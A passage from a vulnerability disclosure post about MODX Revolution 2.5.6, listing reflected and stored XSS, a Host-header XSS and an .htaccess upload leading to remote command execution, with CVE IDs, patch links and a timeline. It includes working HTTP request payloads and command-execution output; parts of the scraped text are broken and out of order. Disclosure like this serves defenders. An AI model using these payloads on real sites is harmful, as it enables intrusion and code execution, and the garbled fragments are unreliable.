26 January 2018 / 4 minutes of reading
action
. However, this vulnerability is exploitable only when server uses PHP 5.3.3, which is minimal version of PHP supported by Modx Revolution 2.5.6.GET /setup/index.php?action=database&database_type="><script>alert(1)<script> HTTP/1.1
Host: localhost
Connection: close
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Cookie: modx_setup_language=en; PHPSESSID=20410ami2ep7vpa0bt33bcv464
Patch:
https://github.com/modxcms/revolution/pull/13424
CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9068
.php
or .exe
, however file with extension .htaccess
is allowed. Therefore, the user is able to upload a file with the name .htaccess
into specified folder. This file can contain php code, which is appended to every requested file with extension .php
in specified folder..htaccess
and following content:
```
php_value auto_prepend_file .htaccess
php_value output_buffering 1
3, The attacker than visits URL <code>http://localhost/?c=ls%20-al</code> and he gets following response:
total 29252 drwxrwxrwx 2 root root 0 Apr 10 15:45 . drwxrwxrwx 2 root root 0 Apr 7 13:51 .. -rwxrwxrwx 1 root root 244 Apr 10 15:44 .htaccess drwxrwxrwx 2 root root 0 Mar 29 11:53 assets -rwxrwxrwx 1 root root 294 Mar 29 11:53 config.core.php drwxrwxrwx 2 root root 0 Mar 29 11:50 connectors drwxrwxrwx 2 root root 0 Mar 29 11:53 core -rwxrwxrwx 1 root root 198719 Mar 23 16:24 dump.sql -rwxrwxrwx 1 root root 3441 Mar 28 08:42 ht.access -rwxrwxrwx 1 root root 1922 Mar 28 08:42 index.php drwxrwxrwx 2 root root 0 Mar 29 11:50 manager drwxrwxrwx 2 root root 0 Apr 3 11:13 setup
Patch:<br>
<a href="https://github.com/modxcms/revolution/pull/13423">https://github.com/modxcms/revolution/pull/13423</a><br>
CVE:<br>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9069">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9069</a><br>
<br>
<h2>Authenticated Stored XSS</h2>
User with resource edit permissions can inject XSS payload into title of any post. This malicious payload will be trigerred by every user, when they visit this post.<br>
<br>
Example request, which creates post with malicious pagetitle:
POST /connectors/index.php HTTP/1.1 Host: localhost Connection: close Content-Length: 3823 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfuNRFVB7kulIsnU4 Cookie: PHPSESSID=vicnm3b9laomhm7pllfgnbdf95
------WebKitFormBoundaryfuNRFVB7kulIsnU4 Content-Disposition: form-data; name="pagetitle"
home'"><svg/onload=alert(document.domain)// ------WebKitFormBoundaryfuNRFVB7kulIsnU4 Content-Disposition: form-data; name="longtitle"
Congratulations! ------WebKitFormBoundaryfuNRFVB7kulIsnU4 Content-Disposition: form-data; name="description"
...
When victim (authenticated or unauthenticated) visits this post, alert with current domain is triggered.<br>
<br>
Patch:<br>
<a href="https://github.com/modxcms/revolution/pull/13415">https://github.com/modxcms/revolution/pull/13415</a><br>
CVE:<br>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9070">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9070</a><br>
<br>
<h2>Unauthenticated Reflected XSS via HOST header</h2>
The attacker is able to trigger XSS by injecting payload into HOST header. However, likelihood of this attack is minimal, becasue it is hard to exploit. Exploiting is possible via Cache Poisoning technique for example.<br>
<br>
Example request with payload:
GET / HTTP/1.1 Host: localhost"
Patch:<br>
<a href="https://github.com/modxcms/revolution/pull/13426">https://github.com/modxcms/revolution/pull/13426</a><br>
CVE:<br>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9071">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9071</a><br>
<br>
<h2>Solution</h2>
Modx Revolution 2.5.7 contains all metioned patches, so it is recommended to update to the latest version.
<h2>Report timeline</h2>
29.3.2017 Vendor informed about mentioned vulnerabilities<br>
21.4.2017 Vendor released new version of Modx Revolution with fixed vulnerabilites<br>
26.4.2017 Disclosed to public<br>
18.5.2017 Assigned CVEs<br>
<h2>Credits</h2>
These vulnerabilities were discovered by Tomas Melicher from Citadelo.<br>
<h2>References</h2>
<a href="https://forums.modx.com/thread/102084/modx-revolution-2-5-7-a-little-more-secure">https://forums.modx.com/thread/102084/modx-revolution-2-5-7-a-little-more-secure</a><br>
<a href="https://raw.githubusercontent.com/modxcms/revolution/v2.5.7-pl/core/docs/changelog.txt">https://raw.githubusercontent.com/modxcms/revolution/v2.5.7-pl/core/docs/changelog.txt</a><br>
All news